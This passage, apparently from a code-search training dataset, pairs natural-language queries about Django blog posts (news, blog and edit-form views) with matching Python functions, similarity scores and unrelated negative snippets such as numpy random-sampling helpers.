"def random_distribution():\n b = np.random.uniform(0.0, 1.0, size=[1, vocabulary_size])\n return b/np.sum(b, 1)[:,None]",
"def random_distribution():\n b = np.random.uniform(0.0, 1.0, size=[1, vocabulary_size])\n return b/np.sum(b, 1)[:,None]",
"def uniform_sample(upper, num):\n sample = []\n for i in range(num):\n value = random.randint(0, upper - 1)\n sample.append(value)\n return sample",
"def sample_uniform():\n global samples_uniform, isample_uniform\n\n # sample of U(0, 1)\n u = samples_uniform[isample_uniform]\n\n # moving to next index of samples global array\n isample_uniform += 1\n if isample_uniform >= len(samples_uniform):\n # exhausted all samples -> re-drawing samples from U(0, 1)\n samples_uniform = np.random.uniform(size=SIZE_SAMPLES_UNIFORM)\n isample_uniform = 0\n\n return u",
"def uniform(low, high, size, dtype=np.float32):\n rng = np.random.default_rng(0)\n out = (high - low) * rng.random(size, dtype=dtype) + low\n return out",
"def uniform(random_state, size=None, low=0.0, high=1.0, ndim=None, dtype=None):\r\n low = tensor.as_tensor_variable(low)\r\n high = tensor.as_tensor_variable(high)\r\n if dtype is None:\r\n dtype = tensor.scal.upcast(theano.config.floatX, low.dtype, high.dtype)\r\n ndim, size, bcast = _infer_ndim_bcast(ndim, size, low, high)\r\n op = RandomFunction('uniform',\r\n tensor.TensorType(dtype=dtype, broadcastable=bcast))\r\n return op(random_state, size, low, high)",
"def generate_value(loc, data):\n return np.random.randint(100, size=1)",
"def uniform(self, size=None, low=0.0, high=1.0, ndim=None, dtype=None):\r\n return self.gen(uniform, size, low, high, ndim=ndim, dtype=dtype)",
"def random_normal():\r\n return inverse_normal_cdf(random.random())",
"def sample_uniform(instance, params):\n subpop = np.random.randint(params['N'])\n return sample_from_subpop(instance, params, subpop)",
"def test_uniform(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.uniform((2,2), -1, 1))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n print fn_val0\r\n print fn_val1\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n numpy_val0 = rng.uniform(-1, 1, size=(2,2))\r\n numpy_val1 = rng.uniform(-1, 1, size=(2,2))\r\n print numpy_val0\r\n print numpy_val1\r\n\r\n assert numpy.allclose(fn_val0, numpy_val0)\r\n assert numpy.allclose(fn_val1, numpy_val1)",
"def get_random_uniform(m,n):\n\n return 2*np.random.random(size=(m,n)) - 1",
"def sample(self):\n u = np.asarray(np.random.uniform())\n return self.invert(u)",
"def rand_gauss(n=100, mu=[1, 1], sigma=[0.1, 0.1]):\n d = len(mu)\n res = np.random.randn(n, d)\n return np.array(res * sigma + mu)",
"def random_normal():\n return inverse_normal_cdf(random.random())",
"def rng():\n return numpy.random.default_rng(564)",
"def uniform(stdev, size):\n return numpy.random.uniform(\n low=-stdev * numpy.sqrt(3),\n high=stdev * numpy.sqrt(3),\n size=size\n ).astype(theano.config.floatX)"
] |
[
"0.7219819",
"0.7165851",
"0.7116001",
"0.70992416",
"0.708078",
"0.70510674",
"0.70472604",
"0.70472604",
"0.70045674",
"0.69709945",
"0.6946136",
"0.69459814",
"0.6933979",
"0.692469",
"0.692469",
"0.69243973",
"0.6828493",
"0.6742964",
"0.6704405",
"0.6655175",
"0.66233355",
"0.6611306",
"0.6595284",
"0.65936863",
"0.6587113",
"0.65787715",
"0.6566365",
"0.6563974",
"0.6538504",
"0.6528314"
] |
0.71848965
|
1
|
Get all the posts that are of type NEWS
|
def get_news(request):
return get_all_posts(request, PostType.NEWS)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_posts(self, published=False) -> Type[QuerySet]:\n categories = self.get_descendant_categories()\n posts = Post.objects.filter(categories__in=categories)\n if published:\n posts = posts.filter(published__lte=timezone.now())\n return posts",
"def get_all_posts(request, show_only=None):\n if(show_only == None):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-is_important', '-published_date')\n title = \"All Posts\"\n else:\n posts = Post.objects.filter(post_type__exact=show_only.name).filter(published_date__lte=timezone.now()).order_by('-is_important', '-published_date')\n title = show_only.name\n return render(request, \"posts.html\", {\"posts\": posts, \"title\": title})",
"def published_posts(self) -> Type[QuerySet]:\n return Post.objects.filter(published__lt=timezone.now()).order_by('-published')",
"def get(self):\n return get_all_posts()",
"def recent_posts(self, horizon: int=30) -> Type[QuerySet]:\n delta = timezone.timedelta(horizon)\n start_date = timezone.now() - delta\n return self.published_posts().filter(published__gte=start_date)",
"def get_posts(self):\n return self.blog_posts.all()",
"def get_posts(url):\r\n feed = feedparser.parse(url)\r\n return feed.entries",
"def get_remote_news_items(self):\n items = []\n params = {\n \"base_url\": self.osha_json_url,\n \"lang\": api.portal.get_tool(\"portal_languages\").getPreferredLanguage(),\n \"query_tags\": self.remote_news_query_tags,\n }\n qurl = \"{base_url}/{lang}/services/hw/news/{query_tags}\".format(**params)\n result = urlopen(qurl)\n if result.code == 200:\n json = load(result)\n for node in json.get(\"nodes\"):\n item = node.get(\"node\")\n pd = item.get('publication_date', '')\n items.append({\n 'remote_item': True,\n 'Title': item['title'],\n 'Date': (\n pd and DateTime(pd, datefmt=\"international\").strftime(\n \"%Y/%m/%d %H:%M\") or \"\"),\n 'getURL': item.get('path'),\n 'path': item.get('path'),\n 'Description': item.get('summary', '') or item.get('body', ''),\n 'text': item.get('summary', '') and item.get('body', '') or '',\n 'remote_image': item.get('image', ''),\n 'node_id': item.get('nid'),\n })\n return items",
"def get_posts(wp):\n from wordpress_xmlrpc.methods.posts import GetPosts\n\n all_posts = []\n\n offset = 0\n increment = 20\n while True:\n posts = wp.call(GetPosts({'number': increment, 'offset': offset, 'post_type': 'post'}))\n if len(posts) == 0:\n break # no more posts returned\n for post in posts:\n all_posts.append(post)\n\n offset = offset + increment\n\n return all_posts",
"def articles(self):\n articles = Post.objects.live().descendant_of(self)\n articles = articles.order_by('-date')\n\n return articles",
"def new_posts(self, number_posts=5) -> Type[QuerySet]:\n return self.published_posts()[:number_posts]",
"def get_posts_from_post_type(context, post_type=''):\n qs = Post.objects.public()\n\n if not post_type:\n obj = context['object']\n if hasattr(obj, 'post_type'):\n post_type = obj.post_type\n\n if isinstance(post_type, basestring):\n qs = qs.filter(post_type__post_type_slug=post_type)\n else:\n qs = qs.filter(post_type=post_type)\n\n return qs",
"async def getposts(ctx, theme):\n q = Query(limit=100, tag=\"travelfeed\")\n for post in Discussions_by_created(q):\n continent_code = get_location(post['body'], \"continentcode\")\n link = \"https://steemit.com/\"+construct_authorperm(post['author'], post['permlink'])\n if post['author'] in curatorlist or post['author'] in whitelist:\n continue\n elif (continent_code == \"AF\" or continent_code == \"OC\" or continent_code == \"AN\") and (theme == \"Africa\" or theme == \"Oceania\" or theme ==\"Australia\" or theme == \"australiaoceaniaafrica\"):\n await bot.say(link)\n elif continent_code == \"AS\" and theme == \"Asia\":\n await bot.say(link)\n elif continent_code == \"EU\" and theme == \"Europe\":\n await bot.say(link)\n elif (continent_code == \"SA\" or continent_code == \"NA\") and theme == \"America\":\n await bot.say(link)\n elif (\"food\" in post['body'] or \"eat\" in post['body'] or \"restaurant\" in post['body']) and (theme == \"Food\" or theme ==\"foodoftheworld\"):\n await bot.say(link)\n elif (\"advice\" in post['body'] or \"budget\" in post['body'] or \"learn\" in post['body']) and (theme == \"Advice\" or theme == \"Travel Advice\" or theme == \"traveladvice\"):\n await bot.say(link)",
"def extract_instagram_posts(self, nodes):\n posts = []\n for node in nodes:\n try:\n post = dict()\n post['dimensions'] = dict()\n post['dimensions']['width'] = node['node']['dimensions']['width']\n post['dimensions']['height'] = node['node']['dimensions']['height']\n post['user'] = self.extract_owner_details(node['node'][\"owner\"])\n post['postId'] = node['node']['id']\n post['code'] = node['node']['shortcode']\n post['caption'] = node['node']['edge_media_to_caption']['edges'][0]['node']['text'] if len(\n node['node']['edge_media_to_caption']['edges']) > 0 else None\n if post['caption'] is not None:\n post['hashTags'] = [re.sub(r'\\W+', '', word) for word in post['caption'].split() if\n word.startswith(\"#\")]\n else:\n post['hashTags'] = []\n post['comments'] = node['node']['edge_media_to_comment']\n post['likes'] = node['node']['edge_liked_by']\n post['imgSmall'] = node['node'][\"thumbnail_src\"]\n post['imgLarge'] = node['node'][\"display_url\"]\n post['postedAt'] = node['node'][\"taken_at_timestamp\"]\n post['isVideo'] = node['node'][\"is_video\"]\n\n if not set(post['hashTags']).isdisjoint(set(_config['instagram']['excluded'])):\n # contains blocked hashtag, skip\n continue\n\n posts.append(post)\n except KeyError as e:\n log.error(\"Problems parsing post {}\".format(str(e)))\n return posts",
"def get_all_posts_from_collection(self):\n response = self.get_comments_all_posts(PAYLOAD)\n collection = (response.json())\n return collection",
"def iter_all_posts(self, limit=None): # new\n feed = self.get_feed(limit=999999)\n posts = feed[\"threads\"]\n if limit:\n posts = posts[:limit]\n for post in posts:\n yield post",
"def get_queryset(self):\n return Post.objects.filter(published_date__isnull=True).order_by('created_date')",
"def get_posts(self): #return list of posts that are associated with this blog_id\n return Post.find_posts_for_blog_id(self.blog_id) #this will return a list of posts objects",
"def related_posts(self, number_items=5, include_ancestors=True) -> Type[QuerySet]:\n if include_ancestors:\n categories = Category.objects.get_queryset_ancestors(self.categories.get_queryset())\n else:\n categories = self.categories.get_queryset()\n posts = Post.objects.published_posts().exclude(pk=self.pk).filter(categories__in=categories).order_by('?')[:number_items]\n return posts",
"def get_queryset(self):\n return Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')",
"def get_queryset(self):\n return Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')",
"def get_posts():\n url = app.config['POSTS_ENDPOINT']\n response = requests.get(url, params={})\n if response.status_code == 200:\n return parse_posts(response.json())\n raise RuntimeError('Error in retrieving posts.')",
"def recent_posts(self):\n\n try:\n jsondoc = json.load(urllib.urlopen(\"http://reddit.com/user/%s.json\" % self.username))\n except:\n raise self.DoesNotExist\n \n posts = []\n for item in jsondoc['data']['children']:\n if item['kind'] == 't1':\n posts.append(Comment(item['data']))\n elif item['kind'] == 't3':\n posts.append(item['data'])\n\n return posts",
"def get_all_posts(self, *fields):\n if fields:\n posts = self.collection.find(projection=fields)\n else:\n posts = self.collection.find()\n\n for post in posts.sort('created_datetime', -1):\n yield BlogPost(\n title=post['title'],\n content=post['content'],\n created_datetime=post['created_datetime']\n )",
"def post_list(request):\n # Only show the posts that have been published\n posts = Post.objects.filter(date_published__isnull=False)\n return render(request,\n 'blog/post_list.html',\n {'posts': posts}\n )",
"def _filter_posts(posts):\n\n return filter(_filter_post, posts)",
"def show_all_posts():\n post = Post.query.all()\n\n return render_template('all-posts.html', post=post)",
"def get_posts(self):\n return Post.select().where (Post.user == self)",
"def show_news_list():\r\n\tnews_list = Page.objects.filter(tags='news').order_by('-created')\r\n\treturn {'news_list': news_list}",
"def get_queryset(self):\n\t\treturn Post.objects.order_by('-pub_date')[:5]"
] |
[
"0.6337393",
"0.6113393",
"0.60611385",
"0.60267586",
"0.6009277",
"0.59933615",
"0.59903824",
"0.58913356",
"0.5810465",
"0.5692559",
"0.5685967",
"0.565168",
"0.5642692",
"0.56090117",
"0.5573423",
"0.55714744",
"0.5566585",
"0.55500364",
"0.5540304",
"0.5528783",
"0.5528783",
"0.5523624",
"0.55138284",
"0.5508864",
"0.5498508",
"0.54798925",
"0.5467636",
"0.5462718",
"0.54179394",
"0.5417362"
] |
0.65027636
|
0
|
Get all the posts that are of type BLOG
|
def get_blogs(request):
return get_all_posts(request, PostType.BLOG)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_posts(self):\n return self.blog_posts.all()",
"def get_all_blogs(cls):\n blogs = Database.find(collection='blogs',\n query={})\n #blogs will be a dictionary of blogs at this point\n return [cls.__dict_to_class(blog) for blog in blogs] #return a list of blog objects",
"def get_bloglist_by_category(cat):\n key = KEY_CAT_PREFIX + str(cat.id)\n blogs = RedisHelper.get_cache(key)\n if RedisHelper.is_cache_exist(key) is False:\n blogs = Article.objects.filter(category=cat, active=True).order_by('-publish_time')\n RedisHelper.create_cache(key, blogs, RedisTimeOut.REDIS_TIMEOUT_1_DAYS)\n return blogs",
"def all_blogs(request):\n\n posts = Post.objects.all()\n\n context = {\n 'posts': posts\n }\n\n return render(request, 'blog/blog.html', context)",
"def get(self):\n return get_all_blogs()",
"def listBlogs(self): #$NON-NLS-1$\r\n atomRequest = self._createListBlogsRequest()\r\n self._sendAtomRequest(atomRequest)\r\n blogList = atomRequest.getBlogList()\r\n del atomRequest\r\n self._debug(u\"Atom List Blogs - returned a list of %d blogs.\" % len(blogList)) #$NON-NLS-1$\r\n return blogList",
"def get_bloglist_by_tag(tag):\n key = KEY_TAG_PREFIX + str(tag.id)\n blogs = RedisHelper.get_cache(key)\n if RedisHelper.is_cache_exist(key) is False:\n blogs = tag.article_set.filter(active=True).order_by('-publish_time')\n RedisHelper.create_cache(key, blogs, RedisTimeOut.REDIS_TIMEOUT_1_DAYS)\n return blogs",
"def get_posts(self): #return list of posts that are associated with this blog_id\n return Post.find_posts_for_blog_id(self.blog_id) #this will return a list of posts objects",
"def get_blog_posts(self, params=None):\n _url = urljoin(self.base_url, self.API_POSTS)\n return requests.get(_url, params=params)",
"def get_queryset(self):\n return models.BlogPost.objects.filter(blog__slug=self.kwargs['slug'])",
"def get_posts(self, published=False) -> Type[QuerySet]:\n categories = self.get_descendant_categories()\n posts = Post.objects.filter(categories__in=categories)\n if published:\n posts = posts.filter(published__lte=timezone.now())\n return posts",
"async def get_blogs(self) -> List:\n parsed_blogs = []\n GRAPHQL_PAYLOAD[\"variables\"][\"tagSlug\"] = self.tag\n GRAPHQL_PAYLOAD[\"variables\"][\"paging\"][\"to\"] = str(self.start_index)\n current_datetime = int(datetime.timestamp(datetime.now()))\n post_id_url_map = {}\n response = await aiohttp_request(\n request_type=\"POST\", url=MEDIUM_GRAPHQL_URL,\n data=GRAPHQL_PAYLOAD\n )\n blogs = response[\"json\"].get(\"data\", {}).get(\"tagFeed\", {})\n if blogs:\n for blog in blogs.get(\"items\", []):\n post_date = datetime.fromtimestamp(blog[\"post\"][\"firstPublishedAt\"] // 1000)\n post_created_on = (current_datetime - (blog[\"post\"][\"firstPublishedAt\"] // 1000)) // (60 * 60)\n parsed_blogs.append(\n {\n # Blog DB Data\n \"post_id\": blog[\"post\"][\"id\"],\n \"title\": blog[\"post\"][\"title\"],\n \"blog_desc\": blog[\"post\"][\"previewContent\"][\"subtitle\"],\n \"blog_data\": \"\",\n \"blog_link\": blog[\"post\"][\"mediumUrl\"],\n \"created_time\": post_date.isoformat(),\n \"read_time\": ceil(blog[\"post\"][\"readingTime\"]),\n \"tags\": self.tag,\n # Author DB Data\n \"author_id\": blog[\"post\"][\"creator\"][\"id\"],\n \"creator\": blog[\"post\"][\"creator\"][\"name\"],\n # Extra Meta\n \"post_created_time\": post_created_on,\n }\n )\n post_id_url_map[blog[\"post\"][\"id\"]] = blog[\"post\"][\"mediumUrl\"]\n\n await bulk_update_to_redis(post_id_url_map)\n push_data_to_db(parsed_blogs)\n\n return parsed_blogs",
"def show_blog_list():\r\n\tblog_list = Page.objects.filter(page_type=3).order_by('-created')[:4]\r\n\treturn {'blog_list': blog_list}",
"def get_all_posts(self):\n cur = self.conn.cursor()\n\n query = 'SELECT blog.blog_id as id, blog.title as title, ' \\\n 'blog.subtitle as subtitle, ' \\\n 'blog.content as content, blog.date as date, ' \\\n 'author.name as author ' \\\n 'FROM blog, author ' \\\n 'WHERE blog.author_id = author.author_id ' \\\n 'ORDER BY blog_id DESC '\n\n posts = []\n cur.execute(query)\n\n for row in cur.fetchall():\n posts.append(dict(row))\n\n return posts",
"def list_blogs(self, **filters):\n\t\tresult = self.client.get(self._endpoint + \"/blog\", params=filters)\n\t\treturn PaginatedList(result, Blog, (self.user_id, self.site_id), \"blog_id\")",
"def main():\n\n url = 'https://blog.docker.com/category/engineering/'\n\n response = requests.get(url)\n\n #print response.text\n\n blog_list = []\n\n response_data = BeautifulSoup(response.text, \"html.parser\")\n\n if response_data.__len__() == 0:\n print \"no data returned\"\n exit(1)\n\n for each_title in response_data.find_all('entry-title'):\n print each_title.text\n #blog_title = each_title.text\n #if blog_title != 'X':\n # blog_list.append((blog_title.text))\n\n #for blog_data in blog_list:\n # print blog_data.text\n\n print 'End main'\n pass",
"def listBlogEntries(self, space):\n return tuple(BlogEntry.create(blogDict, self._modelDataManager) for blogDict in self.pm_getSpaceManager().listBlogEntries(self._unbox(space)))",
"def get_bloglist_by_search(txtSearch):\n key = KEY_SEARCH_PREFIX + txtSearch.upper()\n blogs = RedisHelper.get_cache(key)\n if RedisHelper.is_cache_exist(key) is False:\n blogs = Article.objects.filter(Q(caption__icontains=txtSearch) | Q(content__icontains=txtSearch)\n , active=True).order_by('-publish_time')\n RedisHelper.create_cache(key, blogs, RedisTimeOut.REDIS_TIMEOUT_1_DAYS)\n #print connection.queries\n return blogs",
"def get_posts(self):\r\n postList = []\r\n for tag in self.setting.imgurTags:\r\n try:\r\n req = requests.get('%s%s' % (self.setting.tagLink, tag), headers=self.setting.imgurHeaders)\r\n for post in req.json()['data']['items']:\r\n p = self.json_to_post(post, tag)\r\n if p is not None:\r\n postList.append(p)\r\n except Exception as e:\r\n self.logger.log(logger.LogLevel.CRITICAL, 'imgur.get_posts exception(%s): %s' % (tag, e))\r\n break\r\n return postList",
"def list_all(request):\n\n entries = BlogEntry.objects.all()\n data = {'entries': paginate_objects(request, entries),\n 'blog_info': get_blog_info(), 'action_str': 'All Blogs Shown'}\n\n return render_to_response('blog/list_entries.html', data,\n context_instance=get_rq(request))",
"def all_title() -> list:\n return [i[\"title\"] for i in Blogs_Manager.TablePost.all_query()]",
"def get_posts(request):\n posts = Post.objects.order_by(\"created_date\")\n return render(request, \"blogposts.html\", {\"posts\": posts})",
"def load_posts_by_type(self, type):\n return self.load_posts_by_type_id(type.id)",
"def get_posts():\n url = app.config['POSTS_ENDPOINT']\n response = requests.get(url, params={})\n if response.status_code == 200:\n return parse_posts(response.json())\n raise RuntimeError('Error in retrieving posts.')",
"def get(self):\n return get_all_posts()",
"def test_get_all_blogs(self):\n\n self.new_blog.saveBlog()\n got_blog = Blog.getallBlogs()\n self.assertTrue(len(got_blog) == 1)",
"def blogs_list(request):\n\n # recupera blogs\n blogs = Blog.objects.order_by('-created_at').select_related(\"owner\").all()\n\n # prepara el contexto de la plantilla\n context = {\n 'blog_objects': blogs\n }\n\n # renderiza y devuelve la plantilla\n return render(request, 'blogs/blogs.html', context)",
"def get_posts(wp):\n from wordpress_xmlrpc.methods.posts import GetPosts\n\n all_posts = []\n\n offset = 0\n increment = 20\n while True:\n posts = wp.call(GetPosts({'number': increment, 'offset': offset, 'post_type': 'post'}))\n if len(posts) == 0:\n break # no more posts returned\n for post in posts:\n all_posts.append(post)\n\n offset = offset + increment\n\n return all_posts",
"def posts_list(request):\n\n # recupera posts\n posts = Post.objects.select_related(\"owner\").filter(Q(publish_at__lte=now())).all()\n categorias = Categoria.objects.all()\n\n # prepara el contexto de la plantilla\n context = {\n 'post_objects': posts,\n 'categoria_objects': categorias\n }\n\n # renderiza y devuelve la plantilla\n return render(request, 'blogs/inicio.html', context)",
"async def getBlogs(self, page_no=None, page_size=None, body=\"\"):\n payload = {}\n \n if page_no:\n payload[\"page_no\"] = page_no\n \n if page_size:\n payload[\"page_size\"] = page_size\n \n # Parameter validation\n schema = ContentValidator.getBlogs()\n schema.dump(schema.load(payload))\n \n\n url_with_params = await create_url_with_params(api_url=self._urls[\"getBlogs\"], proccessed_params=\"\"\"{\"required\":[],\"optional\":[{\"name\":\"page_no\",\"in\":\"query\",\"description\":\"The page number to navigate through the given set of results. Default value is 1. \",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":1}},{\"name\":\"page_size\",\"in\":\"query\",\"description\":\"The number of items to retrieve in each page.\",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":10}}],\"query\":[{\"name\":\"page_no\",\"in\":\"query\",\"description\":\"The page number to navigate through the given set of results. Default value is 1. \",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":1}},{\"name\":\"page_size\",\"in\":\"query\",\"description\":\"The number of items to retrieve in each page.\",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":10}}],\"headers\":[],\"path\":[]}\"\"\", page_no=page_no, page_size=page_size)\n query_string = await create_query_string(page_no=page_no, page_size=page_size)\n headers = {\n \"Authorization\": \"Bearer \" + base64.b64encode(\"{}:{}\".format(self._conf.applicationID, self._conf.applicationToken).encode()).decode()\n }\n if self._conf.locationDetails:\n headers[\"x-location-detail\"] = ujson.dumps(self._conf.locationDetails)\n for h in self._conf.extraHeaders:\n headers.update(h)\n exclude_headers = []\n for key, val in headers.items():\n if not key.startswith(\"x-fp-\"):\n exclude_headers.append(key)\n return await AiohttpHelper().aiohttp_request(\"GET\", url_with_params, headers=get_headers_with_signature(urlparse(self._urls[\"getBlogs\"]).netloc, \"get\", await create_url_without_domain(\"/service/application/content/v1.0/blogs/\", page_no=page_no, page_size=page_size), query_string, headers, body, exclude_headers=exclude_headers), data=body, cookies=self._conf.cookies)"
] |
[
"0.6843838",
"0.66168576",
"0.64832556",
"0.643797",
"0.6422606",
"0.63961023",
"0.6386245",
"0.63789034",
"0.6268875",
"0.6239763",
"0.6238986",
"0.6229432",
"0.6159942",
"0.61539686",
"0.61382884",
"0.6066054",
"0.6027976",
"0.5964492",
"0.59064484",
"0.5799068",
"0.5790868",
"0.5767482",
"0.57665193",
"0.5711364",
"0.56987065",
"0.5695277",
"0.5692372",
"0.56492764",
"0.56172895",
"0.5613897"
] |
0.7582103
|
0
|
Displays a view that will allow form input. If pk is not null, show the post to edit; otherwise show an empty form to create a new post.
|
def show_post_form(request, pk=None):
post = get_object_or_404(Post, pk=pk) if pk else None
header = "Edit \"{0}\"".format(post.title) if pk else "New Post"
title = "Edit #{0}".format(pk) if pk else "New Post"
if request.method == "POST":
form = PostForm(request.POST, request.FILES, instance=post)
if form.is_valid():
form.instance.author = request.user
post = form.save()
return redirect(post_detail, post.pk)
else:
form = PostForm(instance=post)
return render(request, "postform.html", {"form":form, "title": title, "header": header})
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def show_edit_post_form(user_id, post_id):\n\n post = Post.query.get_or_404(post_id)\n user = post.user\n\n return render_template('edit_post.html', post=post, user=user)",
"def show_edit_post_form(post_id):\n post = Post.query.get_or_404(post_id)\n\n return render_template('posts/edit.html', post=post)",
"def edit_post(request, post_id):\n post = Post.objects.get(id=post_id)\n check_post_owner(request, post)\n\n if request.method != 'POST':\n # Initial request; pre-fill form with the current entry.\n form = PostForm(instance=post)\n else:\n # POST data submitted; process data.\n form = PostForm(instance=post, data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('blogs:post', post_id=post.id)\n\n context = {'post': post, 'form': form}\n return render(request, 'blogs/edit_post.html', context)",
"def edit_post(post_id):\n\n form = forms.PostForm()\n posts = models.Post.select().where(models.Post.id == post_id)\n if posts.count() == 0:\n abort(404)\n elif form.validate_on_submit():\n models.Post.create(title=form.title.data,\n date=form.date.data,\n time_spent=form.time_spent.data,\n details=form.details.data,\n remember=form.remember.data)\n models.Post.get(models.Post.id == post_id).delete_instance()\n return redirect(url_for('index'))\n return render_template('edit.html', posts=posts, form=form)",
"def show_edit_post(post_id):\n post = Post.query.get_or_404(post_id)\n\n return render_template('edit-post.html', post=post)",
"def edit(request):\n if 'form.submitted' in request.params:\n # delete old post\n title = request.params['title']\n name = title_to_name(title)\n\n if not name or DBSession.query(Post).filter(Post.name==name).count():\n # this should be a popup ajaxy box\n return Response(\"Name %s is in use, choose a different title\" % name, content_type='text/plain', status_int=500)\n\n body = request.params['body']\n post = Post(title, body, name)\n DBSession.add(post)\n return HTTPFound(location = request.route_url('view_post', postname=name))\n\n save_url = request.route_url('edit_post')\n post = DBSession.query(Post).filter(Post.name==name).first()\n return environment_factory(post=post, save_url=save_url)",
"def edit_post(bid, pid):\n # pylint: disable=unused-argument\n pst = Post.query.get(pid)\n form = PostForm(request.form)\n if request.method == 'POST' and current_user.uid == pst.uid:\n if form.validate():\n if pst.name != form.name.data or pst.text != form.desc.data:\n og_name = pst.name\n pst.name = form.name.data\n pst.text = form.desc.data\n DB.session.commit()\n flash('Post ({}) successfully edited!'.format(og_name))\n else:\n flash(constants.DEFAULT_SUBMISSION_ERR)\n return redirect(request.referrer)",
"def edit_profile_post(request, pk=None):\n profilepost = get_object_or_404(ProfilePost, pk=pk) \n if (request.user == profilepost.user or\n request.user.is_superuser):\n if request.method == \"POST\":\n profile_post_form = ProfilePostForm(request.POST, request.FILES, instance=profilepost)\n if profile_post_form.is_valid():\n profilepost = profile_post_form.save()\n messages.success(request, 'Your post has been updated!') \n return redirect(reverse('profile'))\n else:\n profile_post_form = ProfilePostForm(instance=profilepost)\n else:\n return HttpResponseForbidden()\n\n return render(request, 'newprofilepost.html', {'profile_post_form': profile_post_form})",
"def edit_post(post_id):\n\n post_data = {\"id\": post_id}\n db_post = Post.query.get_or_404(post_id)\n post_data[\"title\"] = db_post.title\n post_data[\"content\"] = db_post.content\n post_data[\"user_id\"] = db_post.user_id\n\n return render_template(\"edit_post.html\", headline=\"Add New Blogly User\", post=post_data)",
"def edit_form():\n return template (\"edit\")",
"def show_post_edit(post_id):\n\n post = Post.query.get_or_404(post_id)\n tags = Tag.query.all()\n\n return render_template(\"posts/edit_post.html\", post=post, tags=tags)",
"def task_edit(request, pk):\n task_manager = TaskManager.objects.get(id=pk)\n task = task_manager.task\n if request.method == 'POST':\n \ttask_form = TaskForm(request.POST)\n \ttask_owner = request.user\n\n \tif task_form.is_valid():\n \t\ttask_name = task_form.cleaned_data.get('task_name')\n \t\ttask_description = task_form.cleaned_data.get('task_description')\n\n \t\tif task_manager.task_owner == task_owner:\n \t\t\ttask.task_name = task_name\n \t\t\ttask.task_description = task_description\n \t\t\ttask.save()\n \t\t\treturn redirect('task_list')\n else:\n \tform = TaskForm(instance=task)\n\n context = {'form': form, 'task_manager':task_manager}\n return render(request, 'tasker/task_edit.html', context)",
"def edit_post(post_id):\n\n post = Post.query.get_or_404(post_id)\n\n title = request.form[\"title\"]\n content = request.form[\"content\"]\n tags = request.form.getlist(\"tag\")\n post.tags = []\n if tags:\n for tag in tags:\n post.tags.append(Tag.query.filter(Tag.name==tag).one())\n\n if not title or not content:\n flash(\"Please enter a title and content\")\n return redirect(f\"/posts/{post.id}/edit\")\n\n post.title = title\n post.content = content\n db.session.add(post) \n db.session.commit()\n\n return redirect(f\"/posts/{post_id}\")",
"def show_edit_form(self, obj_pk=None):\n obj = self.model.objects.get(pk=obj_pk)\n # if there is no edit permission then does not show the form\n if not self.has_view_permissions(obj): return\n\n\n # create the edit form a add it to the empty widget details\n # override the function hide_form to make sure the list is shown after the user close the edition form\n params = {\n 'title':'Edit',\n 'model':self.model,\n 'pk':obj.pk,\n 'parent_model':self.parent_model,\n 'parent_pk':self.parent_pk,\n 'parent_win': self\n }\n\n if self.INLINES: params.update({'inlines': self.INLINES} )\n if self.FIELDSETS: params.update({'fieldsets':self.FIELDSETS})\n if self.READ_ONLY: params.update({'readonly': self.READ_ONLY})\n\n editmodel_class = self.get_editmodel_class(obj)\n editform = editmodel_class(**params)\n\n if hasattr(self, '_details') and self.USE_DETAILS_TO_EDIT:\n self._details.value = editform\n self._list.hide()\n self._details.show()\n\n # only if the button exists:\n toolbar = [self.toolbar] if isinstance(self.toolbar, str) else self.toolbar\n if toolbar:\n for o in toolbar:\n if o and hasattr(self, o): getattr(self, o).hide()\n\n else:\n self._list.show()\n if hasattr(self, '_details'):\n self._details.hide()",
"def editor_edit_post(post_id=None):\n post = Post.query.get(post_id)\n return render_template('ghostdown.html', post=post)",
"def edit_post(request, year, month, day, slug):\n post = get_model_for_date_and_slug(Post, year, month, day, slug)\n form = PostForm(instance=post)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save()\n if \"continue_editing\" in request.POST:\n return http.HttpResponseRedirect(post.get_edit_url())\n return http.HttpResponseRedirect(post.get_absolute_url())\n return render_to_response(\"montgomery/edit_post.html\", {\"form\": form}, context_instance=RequestContext(request))",
"def show_pet_with_edit_form(pet_id):\n pet = Pet.query.get_or_404(pet_id)\n form = PetFormEdit(obj=pet)\n if form.validate_on_submit():\n pet.photo_url = form.photo_url.data\n pet.notes = form.notes.data\n pet.available = form.available.data\n \n db.session.commit()\n return redirect('/')\n else:\n return render_template('pet.html', pet=pet, form=form)",
"def handle_edit_post(post_id):\n edited_post = Post.query.get_or_404(post_id)\n\n edited_post.title = request.form['post-title']\n edited_post.content = request.form['post-content']\n\n db.session.add(edited_post)\n db.session.commit()\n\n return redirect(f\"/users/{edited_post.user_id}\")",
"def edit_view(request, title, modelform, instance=None, **kwargs):\n instance_form = modelform(request.POST or None, instance=instance)\n if instance_form.is_valid():\n instance = instance_form.save()\n messages.success(request, _(\"%s was edited.\") % instance)\n return redirect(instance.get_absolute_url())\n return form(\n {**kwargs, \"form\": instance_form, \"action_name\": _(\"Edit\"), \"title\": title},\n \"deployments/form.html\",\n request,\n )",
